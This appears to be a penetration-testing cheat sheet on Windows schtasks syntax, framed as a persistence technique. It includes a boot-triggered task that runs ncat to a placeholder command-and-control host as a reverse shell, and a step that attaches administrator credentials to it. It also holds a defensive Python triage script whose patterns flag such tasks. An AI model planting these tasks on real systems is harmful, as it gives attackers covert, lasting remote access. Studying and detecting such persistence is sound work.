
Scheduled Tasks

A great way to achieve persistence.

Display Syntax

| Parameter | Description |
| --- | --- |
| /query | Performs a local or remote host search to determine what scheduled tasks exist. Due to permissions, not all tasks may be seen by a normal user. |
| /fo | Sets formatting options. We can specify to show results in the Table, List, or CSV output. |
| /v | Sets verbosity to on, displaying the advanced properties set in displayed tasks when used with the List or CSV output parameter. |
| /nh | Simplifies the output using the Table or CSV output format. This switch removes the column headers. |
| /s | Sets the DNS name or IP address of the host we want to connect to. Localhost is the default specified. If /s is utilized, we are connecting to a remote host and must format it as "\\host". |
| /u | This switch will tell schtasks to run the following command with the permission set of the user specified. |
| /p | Sets the password in use for command execution when we specify a user to run the task. Users must be members of the Administrators group on the host (or in the domain). The /u and /p values are only valid when used with the /s parameter. |

View the host's existing scheduled tasks.

# view all scheduled tasks
schtasks /Query /V /FO list
# query a specific task
schtasks /query /tn "My Task" /V /fo list 

Create Syntax

| Parameter | Description |
| --- | --- |
| /sc | Sets the schedule type. It can be by the minute, hourly, weekly, and much more. Be sure to check the available options. |
| /tn | Sets the name for the task we are building. Each task must have a unique name. |
| /tr | Sets the trigger and task that should be run. This can be an executable, script, or batch file. |
| /s | Specifies the host to run on, much like in Query. |
| /u | Specifies the local user or domain user to utilize. |
| /p | Sets the password of the specified user. |
| /mo | Allows us to set a modifier to run within our set schedule. For example, every 5 hours every other day. |
| /rl | Allows us to limit the privileges of the task. Options here are Limited and Highest. Limited is the default value. |
| /z | Will set the task to be deleted after completion of its actions. |

For creating a new scheduled task we must specify, at a minimum, the following:

  • /create : to tell it what we are doing

  • /sc : we must set a schedule

  • /tn : we must set the name

  • /tr : we must give it an action to take

schtasks /create /sc ONSTART /tn "My Task" /tr "c:\users\<user>\appdata\local\ncat.exe <c2c-ip> <c2c-port>"
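
A defender's view of the query and create sections above, as an added example that is not part of the original notes: this Python script triages saved `schtasks /query /fo csv /v` output and flags tasks shaped like the one just created (action in a user-writable path, boot or logon trigger, ncat in the command line). The sample rows, the path heuristics, and the English-locale column names and schedule strings are assumptions.

```python
import csv
import re

# Constructed sample of `schtasks /query /fo csv /v` output, cut down to four
# columns (assumed English-locale names). schtasks repeats the header row for
# each task folder, so it appears twice here on purpose.
SAMPLE = r'''"TaskName","Task To Run","Run As User","Schedule Type"
"\My Task","c:\users\bob\appdata\local\ncat.exe 192.0.2.10 4444","bob","At system start up"
"\Backup","C:\Program Files\Backup\backup.exe /daily","SYSTEM","Daily"
"TaskName","Task To Run","Run As User","Schedule Type"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h","SYSTEM","On demand only"
"\Updater","C:\Users\Public\upd.bat","alice","At logon time"
'''

# Heuristics chosen for this example, not an exhaustive rule set.
USER_WRITABLE = re.compile(r'\\appdata\\|\\temp\\|\\users\\public\\|%temp%|%appdata%', re.I)
NET_TOOL = re.compile(r'(^|[\\\s"])(ncat|nc)(\.exe)?(\s|$)', re.I)
BOOT_OR_LOGON = {"at system start up", "at logon time"}  # assumed English strings


def parse_tasks(text):
    """Yield one dict per task, skipping the header rows schtasks repeats."""
    rows = csv.reader(text.splitlines())
    header = next(rows)
    for row in rows:
        if row == header or len(row) != len(header):
            continue
        yield dict(zip(header, row))


def triage(text):
    """Return (task name, reasons) for every task worth a closer look."""
    findings = []
    for task in parse_tasks(text):
        action, reasons = task["Task To Run"], []
        if USER_WRITABLE.search(action):
            reasons.append("action runs from a user-writable path")
        if task["Schedule Type"].strip().lower() in BOOT_OR_LOGON:
            reasons.append("fires at boot or logon")
        if NET_TOOL.search(action):
            reasons.append("action launches ncat/netcat")
        if reasons:
            findings.append((task["TaskName"], reasons))
    return findings


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE):
        print(f"{name}: {'; '.join(reasons)}")
```

On a real host, feed it the full output of the query command; the extra columns are ignored.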

Change Syntax

| Parameter | Description |
| --- | --- |
| /tn | Designates the task to change. |
| /tr | Modifies the program or action that the task runs. |
| /ENABLE | Change the state of the task to Enabled. |
| /DISABLE | Change the state of the task to Disabled. |

# adding credentials to our reverse shell task
schtasks /change /tn "My Task" /ru administrator /rp "P@ssw0rd"
# run the task immediately
schtasks /run /tn "My Task"

Delete Syntax

| Parameter | Description |
| --- | --- |
| /tn | Identifies the task to delete. |
| /s | Specifies the name or IP address to delete the task from. |
| /u | Specifies the user to run the task as. |
| /p | Specifies the password to run the task as. |
| /f | Stops the confirmation warning. |

schtasks /delete /tn "My Task" /f


Last updated 1 year ago